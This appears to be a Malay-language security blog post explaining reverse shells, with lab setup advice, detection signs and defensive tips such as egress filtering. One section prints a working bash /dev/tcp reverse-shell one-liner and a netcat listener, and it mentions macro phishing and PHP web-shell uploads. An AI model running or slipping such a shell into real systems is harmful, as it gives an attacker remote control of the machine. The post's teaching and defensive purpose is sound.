What are You Looking For?

Zabel
onJune 10, 2025

Reverse Shell: Panduan Hacker Baik & Defender Bijak

2 min read

πŸ›‘οΈ Reverse Shell: Cara Ia Berfungsi & Cara Nak Elak Jadi Mangsa

oleh Zabel Iqbal – fixer malam, janitor digital, dan individu yang tahu beza ethical hacker dengan keyboard warrior.

⚠️ Peringatan (Kena Letak Kalau Tak Nak Kena Ciduk)

Artikel ni untuk pendidikan sahaja. Kalau kau:

  • Seorang penetration tester berlesen
  • Seorang sysadmin yang nak faham teknik attack
  • Atau budak IT yang tengah study dan tak suka jadi mangsa serangan

Then you’re in the right place.
Kalau kau tengah cari tutorial untuk β€œhack WiFi jiran,” tekan butang X sekarang. Bukan sini tempatnya.

🧠 Apa Itu Reverse Shell?

Okay. Guna analogi senang.

  • Biasanya bila kau SSH ke server, kau connect kat server.
  • Tapi dengan reverse shell, server tu yang connect ke kau balik.

Sebab tu ia “reverse”.

Kenapa Reverse Shell Popular?

  • Firewall biasanya block connection masuk (inbound)
  • Tapi connection keluar (outbound) β€” macam nak update software, ping, curl β€” dia lepas je.
  • Attacker ambik kesempatan atas lubang tu.

πŸ’» Contoh Reverse Shell (LAB GUNA, JANGAN BUAT GILA)

bash -i >& /dev/tcp/192.168.0.66/4444 0>&1

Listener (kat attacker):

nc -lvnp 4444

Nota: Kalau tak jadi, semak:

  • IP betul?
  • Firewall block?
  • Port 4444 open?
  • Network sama?

πŸ”Ž Contoh Reverse Shell Dalam Dunia Sebenar

  1. Meterpreter (Metasploit) – Reverse shell dengan banyak feature: webcam, keylogger, upload file.
  2. Phishing + Macro – Email suruh buka Excel. Bila enable macro, shell aktif.
  3. Web server vulnerable – Upload file .php dengan shell.

πŸ§ͺ Setup LAB Macam Pro

  • 1x Kali Linux (attacker)
  • 1x Ubuntu / Windows (target)
  • VirtualBox / VMware
  • Private internal network (jangan sambung internet)

Tips: Snapshot VM dulu, test dalam NAT, guna Wireshark untuk pantau.

πŸ•΅οΈβ€β™‚οΈ Cara Nak Kesan Reverse Shell (Untuk Defender & Sysadmin)

Tanda-tanda:

  • Proses pelik (contoh: bash) connect ke IP luar
  • Port outbound aneh dibuka (contoh: 4444, 5555)
  • Kelakuan user tak logik

Tools berguna:

  • Wireshark
  • Zeek
  • Suricata / Snort
  • OSQuery

πŸ›‘οΈ Tips Defensif: Elakkan Jadi Mangsa

  1. Egress Filtering – Block outbound yang tak perlu
  2. Firewall Rules – Allowlist sahaja
  3. Syslog + Alert – Pantau proses mencurigakan
  4. Endpoint Protection – EDR yang detect behavior pelik
  5. Honeypot – Trap attacker

πŸ€Ήβ€β™‚οΈ Bonus: Reverse Shell Gagal?

Sebab biasa:

  • Salah IP (NAT punya pasal)
  • Firewall block port
  • Syntax salah
  • Antivirus aktif

πŸ“š Sumber Belajar Untuk Ethical Hacker

Platform Apa Best
HackTheBox Real-world challenge
TryHackMe Interactive dan beginner-friendly
PortSwigger Academy Fokus web app security
OWASP Top 10 Standard global

🎀 Penutup: Jangan Jadi Hacker Bodoh

Reverse shell ni macam pisau. Kalau guna betul, berguna. Kalau salah β€” potong tangan sendiri.

Ingat:

  • Belajar – Jangan exploit
  • Lab test – Jangan test kat server orang
  • Kalau tak pasti – Jangan buat gila

Kita fixer, bukan troublemaker.

 

Zabel
onJune 10, 2025
Share
Previous Article

πŸ› οΈ I Fixed the Phantom Overtime Problem (And Your Sanity)

Next Article

Apa Itu NetHunter? Guna Android Jadi Tool Pentest Power

Write a Comment

Leave a Comment

Read Next

Subscribe to our Newsletter

Subscribe to our email newsletter to get the latest posts delivered right to your email.
Pure inspiration, zero spam ✨